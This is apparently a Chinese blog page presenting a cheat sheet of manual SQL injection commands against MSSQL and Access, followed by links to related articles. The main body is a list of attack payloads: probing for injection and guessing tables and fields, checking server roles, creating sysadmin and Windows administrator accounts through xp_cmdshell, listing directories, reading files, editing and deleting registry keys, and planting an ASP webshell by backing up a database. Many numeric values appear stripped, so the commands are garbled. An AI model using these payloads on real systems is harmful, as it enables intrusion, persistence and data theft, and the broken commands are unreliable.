手动方式SQL注入脚本命令之精华版
.判断是否有注入;and = ;and =
.初步判断是否是mssql ;and user> .注入参数是字符and [查询条件] and = .搜索时没过滤参数的and [查询条件] and %= .判断数据库系统 ;and (select count(*) from sysobjects)> mssql ;and (select count(*) from msysobjects)> access .猜数据库 ;and (select Count(*) from [数据库名])> .猜字段 ;and (select Count(字段名) from 数据库名)> .猜字段中记录长度 ;and (select top len(字段名) from 数据库名)> .()猜字段的ascii值(access) ;and (select top asc(mid(字段名,,)) from 数据库名)> ()猜字段的ascii值(mssql) ;and (select top unicode(substring(字段名,,)) from 数据库名)> .测试权限结构(mssql) ;and =(select IS_SRVROLEMEMBER(sysadmin));-- ;and =(select IS_SRVROLEMEMBER(serveradmin));-- ;and =(select IS_SRVROLEMEMBER(setupadmin));-- ;and =(select IS_SRVROLEMEMBER(securityadmin));-- ;and =(select IS_SRVROLEMEMBER(diskadmin));-- ;and =(select IS_SRVROLEMEMBER(bulkadmin));-- ;and =(select IS_MEMBER(db_owner));-- .添加mssql和系统的帐户 ;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;-- ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ;exec master.dbo.xp_cmdshell net user username password /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add;-- ;exec master.dbo.xp_cmdshell net user username password /add;-- ;exec master.dbo.xp_cmdshell net localgroup administrators username /add;-- .()遍历目录 ;create table dirs(paths varchar(), id int) ;insert dirs exec master.dbo.xp_dirtree c: ;and (select top paths from dirs)> ;and (select top paths from dirs where paths not in(上步得到的paths))>) ()遍历目录 ;create table temp(id nvarchar(),num1 nvarchar(),num2 nvarchar(),num3 nvarchar());--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ;insert into temp(id) exec master.dbo.xp_subdirs c:;-- 获得子目录列表 ;insert into temp(id,num1) exec master.dbo.xp_dirtree c:;-- 获得所有子目录的目录树构 ;insert into temp(id) exec master.dbo.xp_cmdshell type c:webindex.asp;-- 查看文件的内容 .mssql中的存储过程 xp_regenumvalues 注册表根键, 子键 ;exec xp_regenumvalues HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionRun 以多个记录集方式返回所有键值 xp_regread 根键,子键,键值名 ;exec xp_regread HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,CommonFilesDir 返回制定键的值 xp_regwrite 根键,子键, 值名, 值类型, 值 值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ;exec xp_regwrite HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName,reg_sz,hello 写入注册表 xp_regdeletevalue 根键,子键,值名 exec xp_regdeletevalue HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName 删除某个值 xp_regdeletekey HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionTestkey 删除键,包括该键下所有值 .mssql的backup创建webshell use model create table cmd(str image); insert into cmd(str) values (); backup database model to disk=c:l.asp; .mssql内置函数 ;and (select @@version)> 获得Windows的版本号 ;and user_name()=dbo 判断当前系统的连接用户是不是sa ;and (select user_name())> 爆当前系统的连接用户 ;and (select db_name())> 得到当前连接的数据库 .简洁的webshell use model create table cmd(str image); insert into cmd(str) values (); backup database model to disk=g:wwwtestl.asp;
手动方式SQL注入脚本命令之精华版的更多相关文章
- SQL注入常用命令
1. 数据库查询版本 Mssql select @@version Mysql select vresion()/select @@version oracle select banner from ...
- phpcms v9 sql注入脚本
phpcms v9 SQL注入脚本 用法:python phpcms.py http://www.baidu.com import requests,sys,urllib url = sys.argv ...
- python 打造一个sql注入脚本 (一)
0x00前言: 昨天刚刚看完小迪老师的sql注入篇的第一章 所以有了新的笔记. 0x01笔记: sql注入原理: 网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作. sql ...
- 安全测试5_服务端的安全漏洞(SQL注入、命令注入、文件操作类)
前面大致讲解了下客户端的安全漏洞,现在来讲解下服务端的安全漏洞. 1.SQL注入(SQL Injection),是一种常见的Web安全漏洞,攻击者利用这个漏洞,可以访问或修改数据,或者利用潜在的数据库 ...
- 常规SQL注入脚本
一:union报错注入 猜字段长度:order by 28 先显示位http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,9 当前数 ...
- SQL注入脚本(基于时间)
#encoding=utf-8 import httplib import time import string import sys import urllib header = {'Accept' ...
- 禁用substr、substring、mid函数的sql注入脚本
#encodeing=utf-8 import requests import sys reload(sys) sys.setdefaultencoding('utf-8') payloads = l ...
- SQL注入技术专题—由浅入深【精华聚合】
作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23569276来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 不管用什么语言编写的Web应用 ...
- SQL注入学习资料总结
转载自:https://bbs.ichunqiu.com/thread-12105-1-1.html 什么是SQL注入 SQL注入基本介绍 结构化查询语言(Structured Query Lang ...
随机推荐
- PHP表单-PHP $_POST 变量
PHP $_POST 变量 在 PHP 中,预定义的 $_POST 变量用于收集来自 method="post" 的表单中的值. $_POST 变量 预定义的 $_POST 变量用 ...
- 谷歌地图api訪问失败
在非外网情况下.我们调用谷歌api会出现载入不到地图的现象.此时能够换一下域名试试或许就好了 比方我自己訪问api时时这样写的: https://maps.googleapis.com/maps/ap ...
- SPOJ 74. Divisor Summation 分解数字的因子
本题有两个难点: 1 大量的数据输入.没处理好就超时 - 这里使用buffer解决 2 因子分解的算法 a)暴力法超时 b)使用sieve(筛子),只是当中的算法逻辑也挺不easy搞对的. 数值N因子 ...
- 解决this web application instance has been stopped already
重启tomcat的时候出错 Illegal access: this web application instance has been stopped already. Could not loa ...
- linux sar命令详细说明相关参数
详细说明linux的sar命令 sar(System Activity Reporter系统活动情况报告)是目前 Linux 上最为全面的系统性能分析工具之一,可以从多方面对系统的活动进行报告,包括: ...
- TRIZ系列-创新原理-25-自服务原理
自服务原理的详细表述例如以下:1)物体在实施辅助和维修操作时.必须能自我服务:2)利用废弃的材料和能量: 自服务原理的第1)个比較好理解,假设一个系统在执行过程中须要进行辅助和维护操作时,最好不要借助 ...
- cpuinfo详解
cat /proc/cpuinfo processor: 23:超线程技术的虚拟逻辑核第24个 ###一般看最后一个0...23 表示24线程 vendor_id: GenuineIntel:CP ...
- HDUOJ----2512一卡通大冒险
一卡通大冒险 Time Limit: 2000/1000 MS (Java/Others) Memory Limit: 32768/32768 K (Java/Others)Total Subm ...
- HDUOJ---Can you solve this equation?
Can you solve this equation? Time Limit: 2000/1000 MS (Java/Others) Memory Limit: 32768/32768 K ( ...
- O(n)复杂度求没有出现的数字(leetcode448)
一个长度为N的数组,其中元素取值为1-N,求这个数组中没有出现的.1-N之间的数字. 要求无额外空间,O(n)时间复杂度. nums[i]=-1表示i数字已经出现过了 class Solution(o ...